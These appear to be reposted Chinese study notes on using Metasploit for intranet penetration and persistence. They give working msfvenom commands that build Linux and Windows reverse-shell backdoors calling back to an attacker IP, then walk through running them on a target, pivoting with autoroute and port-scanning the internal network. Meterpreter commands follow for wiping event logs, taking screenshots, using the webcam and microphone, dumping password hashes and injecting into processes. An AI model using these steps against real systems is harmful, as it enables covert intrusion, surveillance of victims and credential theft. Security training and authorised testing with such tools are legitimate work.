內網滲透 權限維持 - MSF


0x034 MSF

  • 啟動msf msfconsole

    • 先啟動msf依賴的postgresql數據庫

      • 初始化數據庫 msfdb init (要用普通用戶)
  • msf路徑 /usr/share

  • 制作后門 msfvenom

    • msfvenom -p payload腳本 lhost=監聽/攻擊機ip lport=端口 -f 文件類型 -o 文件名

    • linux示例

      • msfvenom -p linux/x64/meterpreter/reverse_tcp lhost 192.168.223.129 lport=4444 -f elf -o shell
    • windows示例

      • msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.223.129 lport=4444 -f exe -o shell.exe
  • 遠控流程

    • 連接后門

      • 1.制作后門上傳到目標機並運行

        • 詳見上一條
      • 2.開啟msf並進入handle模塊

        • use exploit/multi/handler
      • 3.設置payload類型(必須與第一步一致)

        • set payload payload名字
      • 4.設置lhost和lport(與第一步生成的后門一致)

        • set lhost 監聽ip
        • set lport 監聽端口
      • 5.options查看配置是否正確

      • 6.run運行

        • 進入meterpreter控制終端

          • 執行shell可進入目標機終端

          • run可執行自帶腳本或post模塊

            • 自帶腳本文件在/usr/share/metasploit-framework/script
            • post模塊在/usr/share/metasploit-framework/modules/post
      • bg將進程放到后台,sessions查看,sessions 進程id 返回到進程

    • 添加內網路由
      (被控制的目標機只能訪問外網不能訪問內網,給它添加路由以訪問內網)

      • 1.連接上shell之后運行腳本 run get_local_subnets
      • 2.run autoroute -s 內網網段 #例如192.168.223.0/24
      • 3.run autoroute -p
    • 內網掃描

      • 1.用bg把進程放到后台,打開掃描端口模塊

        • use auxiliary/scanner/portscan/tcp
      • 2.設置主機段

        • set rhosts 內網網段 (和上一小節一樣)
      • 3.設置掃描端口

        • set ports 端口1,端口2
      • 4.設置線程

        • set threads 線程數
      • 5.run 執行腳本

      • back 退出當前模塊

    • 端口轉發

      • Portfwd
    • 常用命令

      • 核心命令

        • bg

        • sessions

        • load

          • 和use一樣
        • run

      • 文件操作

        • cat
        • cd
        • cp
        • dir
        • download
        • upload
        • ls
        • ps
        • search
      • 網絡命令

        • if/ipcondig
        • netstat
        • portfwd
        • getproxy
      • 系統命令

        • clearev
        • kill
        • shell
        • powershell
        • sysinfo
      • 用戶界面命令

        • screenshot
      • 其他

        • 攝像頭

          • 麥克風

            • 密碼哈希
    • 進程注入

      • migrate 被注入的進程號


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM